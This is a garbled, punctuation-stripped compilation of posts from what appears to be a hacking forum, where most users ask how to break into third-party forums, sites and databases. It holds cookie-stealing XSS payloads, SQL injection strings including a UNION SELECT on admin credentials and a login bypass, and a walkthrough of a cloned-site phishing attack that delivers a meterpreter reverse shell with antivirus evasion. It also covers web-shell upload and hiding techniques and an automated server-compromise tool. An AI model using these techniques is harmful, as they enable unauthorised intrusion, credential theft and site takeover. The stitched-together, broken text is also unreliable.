not all of the new c features are supported in the versions of gcc distributed with open source operating systems however a sufficient number are now widely available so you can start looking seriously at adopting c features in new development especially where they make a substantial difference in efficiency or clarity mr landau scru.
i have retrived this hash from vbulletin could some one pleasedecrypt it for me i tried cain but it takes time a lot and no b dfedd e b b f.
this xss for invision power board forums working with v may be v alsoxss com forums index php act idx alert document cookie.
found the what appears to be the intro sectionwas reading thru some threads and was ready to comment and saw last post lolyou been around a minute or two i se.
more details like it runs on windows server with microsoft iis i don t remember the mssql version but it will probably be ne.
error you have an error in your sql syntax check the manual that corresponds to your mysql server version for the right syntax to use near where votehash b dbb at line its not possible because the votehash.
edited by request.
try when you re uploading shell to modify the header content type image gif.
i found this coming while on asite and i was wounder how cna i inject a code into itif i can update my accoun.
i can successfully execute this query in one of my host for pen testing.
hello guys i m new to the boards and fairly new to exploiting i have all the basic details of what programs i need and so forth can someone send me to the appropriate place here where i can learn how to gain access to a roots server to get the names and database from a certain website that charges way to much for photos lol if this isn t the right place let me no that t.
hey i need to hack someone s password on a php forum can anyone help thank.
a neat little flash chat application that many use problem is so many people leave the default passwords as is entering anything as the username and the following default passwords adminpass allows any user to login as a administrator stateless cms mode only modpass allows any user to login as a moderator stateless cms mode only spypass allows any user to login as a spy stateless cms mode onlyto get into the stateless cms mode just use the url like this be of use to someone who deals in social engineerin.
no url here.
the webserver of your webspace does not accept php scripts.
i tried google to gimme some asp sites using querystring as parameter input i just realized that every site except a little from brazil is vuln to sql injection wtf bad programmers hahaha l format of list is url descr sep url ole db provider for odbc drivers erro e tcx myodbc you have an error in your sql syntax near or subcategoria like or order by nome at line busca cat asp line ole db provider for odbc drivers error e tcx myodbc you have an error in your sql syntax check the manual that corresponds to your mysql server version for the right syntax to use near at line categorias asp line internal server error asp error technical information for support personnel error type microsoft ole db provider for odbc drivers x e microsoft odbc microsoft access driver syntax error in string in query expression cd link and cd secao navega asp line error a bcd either bof or eof is true or the current record has been deleted requested operation requires a current record english content asp line ole db provider for sql server error e unclosed quotation mark before the character string revista raiox raiox asp line ole db provider for odbc drivers error e microsoft odbc sql server driver sql server unclosed quotation mark before the character string or d dfs sites valoronline valoreconomico sql asp line ole db provider for odbc drivers erro e microsoft odbc sql server driver sql server unclosed quotation mark before the character string novosite links pag asp line vbscript runtime error a d type mismatch cint d domains infnet curso include menuglobal asp line vbscript runtime x a d type mismatch string or informatica default asp line de tempo de execu o do microsoft vbscript erro a subscrito fora do intervalo number index asp line.
the last vuln for proftpd guess.
i used web vulnerabilty scanner and it found a php unspecified remote arbitrary file upload vulnerability in the vesion of php the site i scanned was running it directed me to this page it s pretty sparse with details so could someone give me any more info on exploiting that.
phpmyadmin which version try username root without pass.
in order to follow this attack you will need a copy of backtrack final and it will need to be fully updated this can be done with apt get update apt get upgrade in a terminal once you are up to date change directories in to the pentest exploits set directory the attack we are using is the web site java applet which is choice what we want to do is clone a existing website which is choice we need to enter the url of the website we want to clone in this case i am using xkcd com which is a popular web comic next we need to choose a payload i will be using the meterpreter payload the next choice to make is the encoding this is used to bypass pesky anti virus we can also select the number of times we want to encode the payload i used for the sake of the tutorial but its probably overkill since we selected a payload which requires a reverse connection we need to enter a port for the listener now just hit enter and let set create the evil website if every thing went correctly you should be looking at a screen similar to this now we need to get our target to visit our evil website its up to you how to do this for simplicity we are just going to send a email our unsuspecting target checks his mail and opens the link in his browser notice that at this point we are still at the local ip of our evil web server and there is a digital signature error this error is the only indication that this attack is taking place once our target accepts the warning message our payload executes on our attacking machine one of the coolest parts about this attack is that as soon as the target clicks on any of the links on the page they are taken to the real page on the web and never know what happened game ove.
waraxe do you know how i can make a dll file to use for inside pro to use this algorithm or atleast can you help me crack and by the way it is possible to forge the cookie but im also looking to gain acess to other parts of the sit.
which exploit you re talking about this cms have vuln which isbypass admin login sql xsswell if the site was vulnerable so these exploits should work if not it s mean patched bypasswith this exploit you can bypass admin loginand login as admin username remote sql injectionit s sql injection bug and you should insert this queryin serach php filed union select admin usernameadmin password from mnl admin so you will get admin username password xsscross site scripting example go into search php and insert this alert one waraxe or link rel stylesheet href somefile css and hope this help have fun.
hi everybodycan someone tell why and how this injection works z and if ascii lower substring database i j select union all select k l i mean what does the differnet variables mean fos substring i know the function but what does it mean to write database as arguments is it an array if i want to create a script to tackle responses or what must i change in this injection is there other possible injections to extract table names in short i want know the theoretical basis of all that ps wenta skout.
center size font arial hi guys multiclicker is a new multi platform multi account and multi ptc autoclicker written in java multiclicker is designed to be easily extended with more p directly by users it contains built in builder sdk with debugging support developer may choose to build ptc plugins called simply site now with wizard directly in source code or even using both techniques font size size color black tutorial color size confirmation center url here for download size color url url here for download size color url.
whatever you have between the single quotes sql considers that as data and inserts it as a string you cannot have an embedded query like that you are trying to do something like perl and php do in sql maybe one solution for your prob might be select x from y put it an temp variable and then use that temp vble in the insert or you might have to do a cursor to insert a new value of the temp variable in a loop looks something like this in mssql declare x varchar select x x from y where z z insert into test x.
thanks wo.
upload shell search and find full path to other sites then try to enter on other sites only root have access to etc shadow and some bug appz.
can anybody help me out with uploading shell to cutenews serveri see that waraxe told that there was some possibilities but i did not find way to do it i have admin access in cutenews i also got phpinfo with editing templates waraxe showed somewhere what would be my next step i also uploaded c php jpg to server but i cant open it so i guess i did this wrong anyway what should i do now i know have tried various things what i found in google but no luckc php jpgc php jpegc php jpegbut non of them work so i guess only way is by editing templates appreciate any hel.
i just want to crack the time given by these dll minutes auto close i hope anyone can crack this for me thank you here is the file.
if you need access only to databases use sqlyog.
dmc is a tool that pings services to trigger reverse call to any number in portugal dmc takes advantage of a day flaw in the client side of a popular program download to support the dmc project and receive a more powerfull tool reply back or pm me or send an email to privateloader hotmail co.
in this tutorial i will disclose how to know if a user has an apple product just by digging around with there email the software i used is email recon open email recon and click on facebook write the email in the box and search most users use there name and surname while registering in facebook open notepad and copy paste the name and surname select apple id on email recon write in the box the first name then the surname and finally the email address a message will say if the email is associated to an apple product.
hi if anyone could help i would greatly appreciate it a javascript file on my site seems to be vulnerable to some sort of attack where the hacker is able to append an iframe to the bottom of the file i ve tried a few things such as changing permissions on the file however this has not helped please can someone offer any suggestions i have researched this on google and have only found one relevant link here page that is being targeted is called cappuccino js and this is the code is available here is the code the attacker is able to append to the script.
i have years and i m from kosovo and metohija acually serbia and montenegro i have problems with hash i can not decrypt it can someone decrypt these hash for me c c d e ac d ffedbb e b d c e f a b d fb fbcb fb ci would be very thankuffull we are isolated and we have internet once or twice a week and i can not find tutorials and programs so plz help mei need some programs and tutorials these hash need me for school i m in special school for programming and design my proffesor gona be very happy when he see thi.
you really think that it s impossible to penetrate i think it its indeed i think it s full of holes the only problem its that i don t know how yet anyone help thanks a lo.
i got access to phpmyadmin i can upload files withselect from upshell into outfile home i try to upload form to upload shell or include a shell its tell me when i run up php on the website i dont have privilege it saywarning move uploaded file function move uploaded file safe mode restriction in effect the script whose uid is is not allowed to access home owned by uid in home on line.
hi am new in this forum put i am searching sql infection hack foe month my friend said me ur foru mit really rocks and very helpfully put my question is where i can find the sql infection programm if u cant answer its ok i will not flame put if u can help me or post a link in pm or here i will thank you very much thanx for ur tim.
i recommend ping to do s.
hii m new to the exploit thing so maybe my questions will seem ridiculous but here they are i m trying to get an account for a forum wich has two types of users basic and premium at first i try an sql injection using a perl that exploit a remote command execution vulnerability for phpbb it needs php register globals on and magic quotes off here is the script modified to fit my needs.
no http referer is a program that generates links for you without the http referer there are plenty of services that removes the referer online but with this program you can do it in a flash the main goal to use no http referer is mislead the server to where the link came from by removing this information a webmaster will not see in his her stats or will have a bogus url which will point back to the site download.
welcome to mobile prank hacktool world after a new and fresh update is been released version has a major update with lot of diferent services to make pranks using a browser mobile prank hacktool is a browser to mobile prank tool were anyone can make calls or send smss to any number in the world download scan.
i read everything i tried everything nothing worksthe url goes like this newspop asp arrid this is the sql injection partas i said before i tried everything i know and read yet i can t execute one single command like dir any kind of advise is highly appreciate.
ive done the ipb forum hacking i did that for weeks now im bored of phoning the owner up and making them annoyed and ive used sql injection on normal websitesim just wondering anyone got any decent tuts and vids on rfi more thing can i gain a full system shell if i use rfi thank yo.
i don t know any algorythm that produces what you postedit looks like bit hash which i never heared of the string makes even less sense is that the output you get from putting the hash in some editor multiple s probably indicate your editor cannot display certain characters are you sure this is the complete hash.
well problem solved thread may be closed target i was testing had some very low version of mysql and thus nounion support other targets worked fine just improved needed script php debug variable union select table column from database table where table column.
hi therei m testing a following application which contains this line in script php.
hi everyone completely new to this and would like to gain an admin s account for a particular forum running ipb i have no idea on how to do this so any help would be greatly appreciated info such as what programs i need and links to download them would be helpful also i have no idea when it comes to running or using the script in the thread help me.
i m interested and i private messaged you for more details.
nowell the best working is private message one way to not afraid the reader of the redirection is to redirect in his message window and delete the crafted message works some don t even notice redir.
i have access to a ipb forum on root admin i was wondering if theres anyway to log users passwords in plain text as they log in and send them to my email for example im a noob at this so i have no ideathank.
try uploading a image shell a image with some php code in there use the lfi to load the image and the php will run try including a shell of some sort or some simple php code to give u a basic command line.
make a new post and add an uploadthis html fileadd this html file in a post as an attachment alert vuln then click the attachment anyobdy got this working so it steals cookie.
not sure where to post this so here goes i gained access to a phpmyadmin db on a server using a weak loginhowever there is no functional tables in this db just test and information schemanow that i am on the server with some extended permissions are the any exploits i can use to gain access to server extract info file disclosure etc maybe uplaod a shellthank.
use proxies very easy to use and to learn for an easy guide search in google and for the proxy ists too.
can you give some link from tutorial beacouse and i dont understand php thank.
where i put this in url bar.
all that script does is show your own cookie for it to work you d need to get someone else s cookie.
hi againanother website disabled the use of parentheses so any injection effort with ends in an error pagehow else can i get the database name because database is useless thank yo.
i need information for proftpd salu.
this sounds really tempting i know a website i d really love to get access tocan you explain me how or show me a topic where it s explained anythin that helped you can help me i gues.
i m kinda new here but if you use a whois siteand you come up with server type apache is that actually the server software or not.
sql injection what is safe i m writing a web application and ofcourse it has to be safe so what is safe since sql injection is a upcoming trend i need make sure my app is safe from sql injection attacks i don t believe you can prevent a succesfull injection by just escape your data with mysql real escape string php what is your advice lord vade.
st post so bear with me if say i wanted to hack a forum such as i ve read some thing about the cookie changing method and have tried this with the same hashes other people have used for different forums i think this is the reason it doesn t log into any admin account and does not appear to do anything different to refreshing the page if this is the case can someone tell me where i get the hash key i need to put into the cookie box please what i m doing is using firefox an addon going to the forum tools live http headers refresh the page getting something such as.
hey there are these guys and they just shut down my forum they are a group called iamthewalrus so far they have hacked of my emails youtube of my forums i made a new one after they shut down first now they shutdown new one they have also hacked of my chats and put a referral on my website so when you visit it porn sites pop up they say they are the best and i can not stop them they have forums and a irc chat please please teach me how to do a little damage to them this is one of the most advanced forums i know and if anyone can put them in their place it would be you guys sorry for taking up your timethanks for reading alsoif this is this post goes against any rules please tell me and i will delete it thanks agai.
ok someone can decrypt the root user bbde c a f c c ba e d c.
trying to upload with what try to give more info.
google might help you.
i would like to get into a custom built php site all i need to do is get into the mysql database and somehow into their ftp so i can download their files because it s and rpg game and i want my own one lol so just an sql injection that can give me the username and password and someway to get their ftp info i know one thing they are hosting with ipowerweb.
you need to put the script onto a site one which accepts php and there is a tutorial how to do this hope this help.
a little more information can be helpful for some people e g what kind of site is it you have something yet or still at the start.
did you try google the error you may have more luck with english error btw which wamp version did you download.
put limit at the end of your query.
the ip is only for this one site.
in need of a way to hack phpbb board i ve got about as much intelligence of computers as does the average man any help.
hello can anyone tell me what this code do.
try to use instead of a space likeid or orid or.
there is a critical xss vulnerability within the theming section of the admin panel they do not removing tags such as thus leaving a hole where any theme developer can release a theme where when the admin views a theme in the themes section it executes javascript as an example in my theme s style css file i change description to description script alert hi description alert document cookie description window location final example is obviously the worst if i wanted to have the vulnerability execute while staying hidden i could create a hidden iframe and execute the redirect in the iframe this vulnerability is a simple one and i am quite surprised to see it if they don t filter this input i assume you don t filter other input from themes such as the footer if the iframe example used above is placed in the footer of a theme the situation could be even more dangerous if a website is using the url the cookies of are also insecure i have contacted them about the issue so get in early before they patch it.
sorry i thought  use proxies very easy to use and to learn for an easy guide search in google and for the proxy ists too  have it explained it my fault its a program that uses proxy servers all over the world making your ip different it can be set to change every second or every minute it can make browsing a little slower but the more you use the net the faster it gets or if you want you can stick to the same proxy fake ip hope this helps.
i got super admin rights on an site i hacked it using sql injection now its back end displays everythign from its sms gateway and all i can even use it the problem is i tried to upload n shell but i don t see any out put the backend has no template edit option but in many text boxes html and php script run but when i copy past shell script in it the out put is nothing please help.
hii ve uploaded a shell on the server but i want to penetrate the server what can i do my goal is the database in the when i tape the in the sqlconnector it displays the databas.
hey is there any way to retrieve old msn convos if u have the option set off for saving convos.
i have finding an exploit sql injection and whene i want to see all table and name concat didnt work for m.
thanks a lo.
alright first of all hello everyone i m rather new to this yadda yadda i know this situation has been given and discussed several times before but hasn t been solved to a point where i can understand it yet this topic fits it perfectly i ve got admin access to a cutenews system but i have trouble uploading the php shell the shell is on my webserver as well as on my hard drive of course i have followed all the steps that have been described but as said i haven t gotten far enough all of the topics have been abandoned and left with open questions at least from my point of view and since topic reviving can be quite annoying i m starting this one thus i would like somebody to answer maybe even give a step by step instruction the question on what to do now edit the templates to include the shell i have already tried things like this and derivated versions of that with little success i got to see the config php but i had to undo it to cover any traces quickly can i simply replace that php function in the end by linux commands such as webgetting my shell thank you very much in advance fina.
powered by bb blueboard as you can see it says blueboard i never saw a board like this before and i am pretty sure the bb is not bulletin board for short is there any exploits for blueboard.
root linux user not mysql if you can read files then you have many options try using mysql to read etc passwd match passwords with mysql users or other passwords you have gathered.
i would want to check the version of the sql server they are using and look for exploits who knows maybe you will get more than just your target databas.
ok well first get the type of software used on the target server once you have that you can start to look into exploits for the sortware.
thank.
do any body know about any working exploit against a redhat box its has webserver mailserver mysql server etc runnin.
try this user or pass or its an old old exploit but one that doesn t look to be blocked for you it should log you on as the first account in the database using the highest level administrator.
well if you can find what kernel he is using or software versions and search for working exploits for that version of software kernel ask around here once you find out what the full kernel version he is using and someone may be able to supply you with a working exploit shai ta.
i ve already gained access to to phpmyadmin via the web interface with the username sa and blank password but there are no usable tables in this particular db can i use any sql injections commands or other methods to gain further access or info from server now that i am logged into the pmaver there is an option to import a txt file can i upload a shell here thank.
there is more then error it is saying i am missing like dll s and when i look in the folder the dll s are there sand i used wamp server.
hi i m mucha and i m new at waraxe usi m planning to learn how to get acces to phpbb hashes i looked in your phpbb section and tried the xss that steals a cookie and generates cookies txt on your own server well that didn t work for me maybe it s because that forum is running on is there a way for a user to see that i don t now if that s going to work but then there is somthing i now shit about the injection and stuff how do you rune such scripts on their server can someone explain me this type of gaining information from phpbb what do you think is the easiest best way to hack phpbb i m very happy i found this forum what i already read here in a day is more than a month of google.
if so then the last bytes are flags possibly used in the calculation no encryption ever generates one pair of space characters one pair of one pair of ascii two groups of ascii sif you can try other user pass data and see what happens to bytes perhaps the s turn in to s or s then.
well if you are honestly trying to help out i will be more direct i am sending a string of code through char variable called m psndbuffer the first char is a ckey char dwsize the string consists of ckey player name noob account name test server name then this encrypted account password below is a seperate encryption code that is being used after getting the encrypted account password the encrypted account password is the last bytes the entire string being sent to this code below to be further encrypted is this example has a different account name password which is test asshole buffer char int m psndbuffer m psndbuffer r m psndbuffer m psndbuffer m psndbuffer m psndbuffer m psndbuffer m psndbuffer m psndbuffer m psndbuffer n m psndbuffer o m psndbuffer o m psndbuffer b m psndbuffer m psndbuffer m psndbuffer m psndbuffer m psndbuffer m psndbuffer m psndbuffer t m psndbuffer e m psndbuffer s m psndbuffer t m psndbuffer m psndbuffer m psndbuffer m psndbuffer m psndbuffer m psndbuffer m psndbuffer m psndbuffer m psndbuffer e m psndbuffer d m psndbuffer c m psndbuffer m psndbuffer b m psndbuffer m psndbuffer c m psndbuffer f m psndbuffer m psndbuffer m psndbuffer m psndbuffer m psndbuffer b m psndbuffer b m psndbuffer a m psndbuffer m psndbuffer m psndbuffer f m psndbuffer m psndbuffer m psndbuffer m psndbuffer d m psndbuffer d m psndbuffer c m psndbuffer b m psndbuffer m psndbuffer m psndbuffer a m psndbuffer f m psndbuffer c m psndbuffer m psndbuffer m psndbuffer m psndbuffer m psndbuffer m psndbuffer m psndbuffer m psndbuffer m psndbuffer m psndbuffer m psndbuffer m psndbuffer m psndbuffer m psndbuffer m psndbuffer m psndbuffer m psndbuffer m psndbuffer m psndbuffer m psndbuffer m psndbuffer for i i int dwsize i m psndbuffer i i ckey m psndbuffer i char m psndbuffer i ckey dwsize i.
hello i am new here i registered on this forum for reasons which i have one question for you i alarmini paradox sp system and lost my keychain the company that i was equipped with by no longer exists and the other will not work and have some astronomical cost me to fix it so i came up to buy online nedje the key to this model whether to solve the problem just buy a key and it will work because we now store the other is not protected.
did you try not yo use the semi colon instead maybe use id onlyand how do you know you have update permission.
hi guysi m trying to find out how this exploit is working tried it on sites and it seems that is not working any suggestions.
yea but something seems wrong because when i edit my cookies firefox automatic resets them any fix for that.
hello again pink spiderwhat makes you think it s a forum it s not it s just an adult site thank you for trying to further help but i already solved the matter yesterday and was able to find out which databases exist on that site however your help didn t go in vain because i found out about schemata so thanks again oh and i tried because you wanted to know about the last code you postedno nothing found.
please note there is three parties target website for which you want the cookie to be stealed attacker website contains info that victim is visiting for and additionally cookie stealing iframe or frame victim person who needs to be active both in target website and attacker website and target website must contain xss security hole if you are taloking about html and javascript enabled then probably you mean by this persistent xss where javascript can be injected permanently to target website s content still most xss security holes in real world are reflective xss read wikipedia and xss whitepapers available in web there is lot s of theory behind this you can t just jump in and start exploiting xss read basics first just my.
hidear all members i need your help till night its so urgrnti had sql injection in a server asp mssql error based attack and with a foolish mistake i drop their table and they enumurate this attack and blocked my ip and repaired their bug now i have all the tables and columns i need to insert one row and data entry please help me i didnt find any sqli in their website but i hope with this info i can do what i want can i insert rows in their database without sql errors in the normal pages and what query need to do this the table name is user and columns are plnuser id top id top id side ref id holdername nickname nic tap phonecode phone email registerdate currentbalance profit activated restricted tradingid password cntryid dwn id left dwn id right username usernamestatus gender investamount usertype birthdate lastlog tempactivation viewnoteemail nicdate plbstatus plbprofit clamount cramount llamount lramount wlamount wramount omt wpoint wbonds wbondsamount tmpplbprofit tmpcntbit plbbit lastmonthplb plramount plbplantprofit plant status plant status screturnamount tactivated scactivated enddate newplbstatus offlinepath calculated firstname lastname fathername every bod.
hi guysi just would like to know how can add new hash modules to passwords pro old version because i know how to do it in the last version but i did not find a methodo to do it in the older and full version could please somebody teach me thanks in advancecheer.
mysql real escape string is supposed to do a pretty good job if magic quotes gpc is enabled first apply stripslashes to the data using this function on data which has already been escaped will escape the data twice also note mysql real escape string does not escape and these are wildcards in mysql if combined with like grant or revoke also ensure that all user input is limited to a set length choose the characters that are allowed for input and manually ensure server side that those are the only ones that are accepted i think that would cover it pretty well correct me if i m wrong.
hi sorry for my poor english as you know theses tools are usefull to make more easly an sql injection the links to these tools are already in this forum i know what is an sql injection and i know how to exploit them but really strange i am not able to understand how theses tools works how to use them ok if i know how to exploit without these tools an sql injection i don t need them it s true but if they can help me i really want to know how to use them so my question is these tools got the same fonction so anyone can explain me how they works is there a tuts or something else to learn how using them thank.
this is a exclusive release html teacher is the right tool to learn the basics of html in a simple style and easy to use a user can pick and create live examples of html learn how to make a link insert a image video or mp aside from learning how to embed mp videos swf flash and youtube videos download.
hy all i need help with hack root from website that use phpmyadmin i think it can be done with brute force but it will take time to do that anyone please tell me another way sqli maybe.
safe mode bypass in curlgeneral problem exists in curl functions because are changed safe mode strings x arechange to next bug exists in prefix file because safe mode checks onlypath at file example safe mode bypass exploit safe mode bypass exploit safe mode checks only access only to file but curl php so you can include any files from directory where script is but in this exploit you can only read files from directory where is this script you can tuse there is another conception for an exploit if you have an access to a directory rights where you want to read files so if you want to include files from home czarnobyl php you should make a dir like home czarnobyl php safe mode bypass exploit safe mode bypass exploit safe mode checks access to file file home czarnobyl php yourfile php and curl include only file home czarnobyl php because x are ending path to file i ask myself if it is possible to construct a php page to insert in the site in order to start the bug and use it for inclusion.
upload an image where i don t think there is any place to upload an img let alone a shell image you mean image jpg php.
and found thi.
ok i am waiting month and no one answe iknow to many users have it so can anytone pm me help i dont need it for webpage yes i need it for m.
usb retriever utility was design to be simple basically what it does is copy files from any usb device to your hard disk this tool was intent to be installed in public access computers such as libraries or schools and it runs in the background copying files to the hard disk when a device is plug in into the computer although it runs as a standard executable and saves files automatically this program requires administrator privileges in order to run each time the computer starts the source code is available in the archive for scan it s detected by some antivirus this is because i m using an outdated compiler.
bumping this topic perhaps more information is needed contact me or post a reply i ll give you some official url if needed.
i have been trying to install hydra for a little while now i have basically no knowledge experience in cmd hacking cygwin and hydra i tried using cygwin but i cannot manage to install that through cmd either i followed steps correctly but i keep getting the result that either cygwin or hydra is not recognized as an internal or external command operable program or batch file i m not sure if having a space in my admin name has anything to do with this these are the sites i ve used anyone has the patience please help me figure out what i can do so i can finally use hydra thc thank you.
i was assuming it to be the first characters of a hex sinceda ed f all characters are within a fand if my assumption is right the colon is probably not part of the hash but since two characters in a hex string make one byte the first or last byte wouldn t be complete i don t know of any hash that defaults to a bit output each hex character represents bits i ve also tried comparing the md and sha of test to this string but it doesn t seem to be a substring of any of those afraid i can t help you with this one m.
if you say the last bytes form the password then it would contain some hexadecimal characters following eachoter space characters and no hash produces something like that i think your password is from index which are bytes of hex characters edc b cf bba f ddcb afcfollowed by either a server ip in some coding or perhaps some flags md asshole doesn t get you that string though perhaps another algorythm.
the password is index to for sure but yea thanks for taking an interest in the problem it must be some kind of home made encryption like the code i posted above.
if this url me thiswarning mysql num rows supplied argument is not a valid mysql result resource in home patentba public html eurls com smarty libs plugins function return paged results php on line or me thiswarning mysql num rows supplied argument is not a valid mysql result resource in home patentba public html eurls com smarty libs plugins function return paged results php on line warning mysql fetch array supplied argument is not a valid mysql result resource in home patentba public html eurls com smarty libs plugins function return paged results php on line someone can tell me what i can do it to do injection thank yo.
tool pentest exploiter v description dedicated exploiter is an advanced wevdav vulnerable scanner with many and unique features it is an automatic tool which can automate the process of hacking dedicated servers it consists of four parts the ip grabberthe webdav finderthe vulnerable scannerthe auto shelleryou are also able to use these tools with your input it is ideal for beginners who want to get their first dedicated server as well as for experts who want to increase their quantity of dedicated servers main features automatic ip grabbergrab ip s from any siterange ip ip generator nonstop option grab ip s from fileextremely fast and accurate ways of getting the ip sfully customizable auto page changerip s limit for memory webdav dir findergets the grabbed ip s and checks if webdav dir existssplit the ip s into working and non workingtimeout optiontotally scannerchecks if ip with webdav dir is and pass can be modifiedshell uploaderupload user defined php letter for temporary features secure hwid login update systemexport to file optionremote desktop code structure url here for download size color url url here for download size color url color red scan report color.
private loader cp was been design to be simple and efective tool to promote your files and text across multiple online sites this is the control panel cp used by private loader to manage and share files across the web it is a complete tool to upload files images videos and texts in a snap this tool has a limitation which is that it doesn t have any accounts available you will have to register and use the same browser that you register to launch private loader cp the login credentials will have to be saved in the browser this is done by simply saving usernames and passwords on the browser in the form of cookies for safe usage use a portable version of any browser out there download.
how to load index html write skype id hit the prank buttondownload a html file so no harm will do to your files and works on all plataforms.
lol good luck withtha.
this one is simple and good.
thought about using a rootkit you can find some good ones on linux s site.
whats up guysanyone have advice or experience when trying to hide a shell on a webserver what i ve been doing is hiding the shell inside an existing file with something like this if isset cookie itsme shell code and then obfuscating the code i ve read this.
i have tried all there islike simple pocs but the database is not spiting any errorscan someone give me a hand since im kinda new to injectionhere is the form.
you can try wit.
well the question would be which forum are you trying to hack check out the advisories for sql injection on this site all the queries you need to pass are pretty much there if this is like a custom hack you are trying to do you need to figure out the table structure ie column names etc and then craft your query.
i m using this exploit for oscommerce i know the db details and everything but what can i do where can i possibly try and find phpmyadmin or anything of better use i know the location of a backups folder but obviously i don t know the backup file names any help.
have a look here dude.
you cant use order by for geting many of columns ofcouse any functionthis is ex.
i ve read some articles about injection and retrieving information but i m still a newbie recently i ve been looking at this website merentha comi ve found that they have a lot of pages that come up in the url as this also noticed that this looks a lot like the different examples in articles i ve read about sql injection i was wondering if there would be anyway i could maybe pull information from the database i m thinking that maybe some password files are stored in the database if maybe someone could give me some hints suggestions i d appreciate it greatly or maybe even some articles that would lead to how to determine what to do asp php sql mysql or some sort of information regarding injection that would work against this system they have in place that too would be appreciated thanks a lot trol.
i would recommend reading up on sql injection well as learn some php some perl grab some phpbb source code look for try to steal cookies and take my word for it if you ever get to the admin panel backup the database and copy it to your drive from there you can retrieve md passwords reverse mod passwords and with some luck expose an opening that will allow you to write backdoors all over the site s code.
sorry didn t read the title.
hi alli scan a few networks websites and so on to test them and also my scan software but there is something i dont get how on hearth do i use the mod frontpage vulnerability cve i cant find any complete information on this one and also i cant find any kind of exploit to it thanks in advance for any hel.
i have a question concerning posting in a private phpbb forum by a user that does not have permissions to see post in the private forum our phpbb has a post in a private forum by a registered member who most certainly does not have permissions to see much less post in the private forum i was wondering how someone could do this and how i can prevent it website has php platinum protector enable.
since he has a web server check the pages that are there or for any cms check who is the provider of the server hosting etcif you spend some more time and gather all the info that you can find and not just ports and os versions im sure that you will be able to do smthhave in mind that this actions are illega.
wow you can do that doesn t it check the mime type of the file.
how does one test for or exploits on a particular web server that may allow an outsider remote access to the server database perhaps allowing someone to view user account information incl passwords the i p address of the server is thank.
i ve seen this posted here before but i figured i d post it again since i couldn t seem to find it this works on pirated versions of vb since most of the time the administrator isn t slick enough to remove the install files i d try this before you use any sql injections or break your back trying to find a good perl exploit com install upgrade php step backup do sqltable table vb userthat will download the user table com install upgrade php step backup do sqltablethat will download the entire database works on almost any vb x that is pirated which most are cheer.
i don t understand clearly please reply with detaile pleasee.
ive been experimenting with phpnuke on a site that i know is vulnerablev im running it on the latest version of wamp however i absolutely cant seem to get any of them to work i know that its vulnerable to but i keep getting errors i researched and found out that its because of apache mod security any suggestions on getting around it edit update ive tried all the exploits written in c for but have gotten nowhere any ideas.
hi guys i need dnn exploit or bug than.
searching for exploits.
yeahwhat do i do with i.
ok so if lets say the site is z invisionfree om would the syntax be name of script pl z invisionfree com i dont know what they mean by folder where ipb is installed this is for koko s script cuz i think it has the potential to work on ipb final but i do not know how to harness it.
anybody.
set it up on a free host that supports asp.
i am trying to make an sql injection in the input field i type and i got.
i managed to crack one of them edbb e b d c e f a pizon hope i helped.
unless you ve left any of your permissions open sql injection is a common hack but your site is unlikely to be targeted.
it just asks you to use a table for your query the script does not know where to select nothing this means your query is quite broken it has to be select bla from foo where blafoo.
so i was reading some stuff andfind out this soft so i give a try and downl it d and try on some sytes anyway it works for one syte i got like cross syte scripting errors broken links ect anyway good soft so i scanned one mu online server and get smth like this it seemes that user credentials are sent to shop login php in clear text this vulnerability affects shop login php get username password remember yup a third party may be able to read the user credentials by intercepting an unencrypted http connection can i use it is it possible to get in webshop if it s possible how can i do that p s by this form input is possible to upload a file to the server this vulnerability affects wow templates offlike admin index php user may upload malicious files to server this directory brings me from that mu o server to wow bc d i was like wtf it s like an ftw serveri full with stuff what can upload in it good suggestions p s when i try to fck something i got this warning invalid argument supplied for foreach in c appserv wow templates offlike admin admin members php on line got any suggestions what can i do.
this is my first message at this forumbut i am not a newbiewell as you know remview php a file administration scriptcan be saved as a text file and if a script of a victim with a site of php of course has a bug you may divert the link and you may reach till rootdepending on the file permissionsi have tried with some german guestbooks and they all worked wel.
its uses what its used for mighty confused.
i hate the site s that i ve spent an hour hacking only to find that logging in as the admin has no admin panel or the admin pass for the site isnt the same for the admin section fukin pop up script that asks for another uname pass good security thoug.
s a nice tip on how to manually concatenate zip files now you can easily create tb file.
un ion will only work with some databases to evade this mysql treats as a field seporator so this will not work as for the check it is flawed as waraxe stated also checking for such things is ok but what if the query string is manipulated like how php will do url decoding on the query string when it assigns request get post cookies or when doing register globals assignments also other string manipulation later might change something in the query string checking for union and nuke authors is a bad idea it will deny many false positives if you check for it in post data and it will not do any good if you dont check in post data forget cms do html yourself just a suggestion.
i just wanna say thank you for the information that you have been shared i am glad that i have read your post freelance writing job.
so how do iinstall the gcc when iget cygwin.
ok messing around with it this is what is happeningi changed the md which is in only files reguser php in the root of the chipmonk forum folder and one in the admin folder called reguser php and i changed it to password so it said this before if password pass post password password md password and now it says if password pass post password password password password also i added a copy of the table users and called it users but i m kinda stuck how do i alter it so it will make a copy to that table can you help can anyone help when i did the password instead of md i got this errorfatal error call to undefined function password in public html monk reguser php on line i m close i can taste itp s i am using this as my forum so that way everyone knows what i am messing with anyone knows how to do this or has it done allready with another board style i will gladly try what you got but i am only doing this one since its really small and easy to understand.
wow waraxe you are a god ok now comes the big super question can you please help me with this is there anyway i can ask you to either show me a tutor that is out there or what the code that i supposed to add looks like i m great at adding mods to boards but not a pro at php and sql but i am a fast learner the chipmonk board i posted the link for is perfect if you can show me something for that or even phpbb or hell any board i am not picky anything will do i m happy enough just to get a answer from someone who knows what i am asking about again thank you for answering my question i hope you can help me by making a tutor or even a premade file or anything so i can get this uploaded and get it going.
hm i ve heard of ipb v final being hacked before so i ll do a bit more research and find out it it s possibl.
please can somebody give me a tool for mass defacement that can identify an injection hole in sites and also can somebody explain into details how to hack into a server using c shell and upload into the server i will be glad if this anybody can be of help i will be proud of any help you render i am a beginner in this danie.
i dont really know what s going on here.
thank you so much i tested out net view today and there are over coputer on the local network and remembered that a friend once b did a net send with this and later that day was called down to the office so is there a way to anonymously do it.
well i could ve just gone directly there well i m in it what now.
amazing thanks so muc.
nhtu check the url.
and i am again here after a while i gave up but today i finally got it but there is a new problem for what i don t know what it is and how to fix it i hope you can help me with that.
just a question i searched google for phpbbexpl exe but no results were found can i have a clue as to where i may find it.
cool man you are my idol lo.
its written in net using aspx pages making hard job for sql inj thus btw wtf is site is that.
when trying to do anything php related i get an error stating oci dll not found etc when i install oci dll i get an error stating the procedure entry point ocilobread could not be located in the dynamic link library oci dll any ideas help would be appreciated.
what programs u use to combile pl file type exploit.
